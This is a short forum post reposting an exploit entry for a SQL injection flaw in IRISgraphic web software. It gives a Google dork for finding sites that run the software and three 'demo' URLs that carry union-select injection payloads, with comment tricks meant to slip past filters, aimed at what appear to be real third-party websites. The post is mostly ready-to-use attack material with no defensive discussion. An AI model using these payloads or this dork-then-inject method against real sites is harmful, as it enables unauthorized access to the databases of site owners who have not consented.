IRISgraphic sql injection (1 Viewer)

Z4T4R4 · Mar 10, 2020

Revealed content

Kod:

# Exploit Title: IRISgraphic sql injection
# Google Dork: "Powered by www.IRISgraphic.com"
# Date: 2020.03.07
# Exploit Author: Milad Karimi
# Vendor Homepage: http://www.irisgraphic.com/
# Software Link: http://www.irisgraphic.com/
# Category : webapps
# Version: 1.0
# Tested on: windows 10 , firefox
# CVE : CWE-89

################################################
proof of concept :

Sql Injection Vulnerability
 1- search google Dork :  "Powered by www.IRISgraphic.com"
 2- sql injection



demo
  http://kbe-lb.com/kbe-lb/news.php?id=13/*!50000union*/%20select%201,2,3,4,5
 
  https://www.isofood.net/products.php?brand_id=2&&category_id=-36/*!50000union*/%20select%201,2,3,4%23
 
  http://alfazonelb.com/alfazone/gallery-slider.php?id=5/*!50000union*/%20select%201%23
 
  #Discovered by : Milad Karimi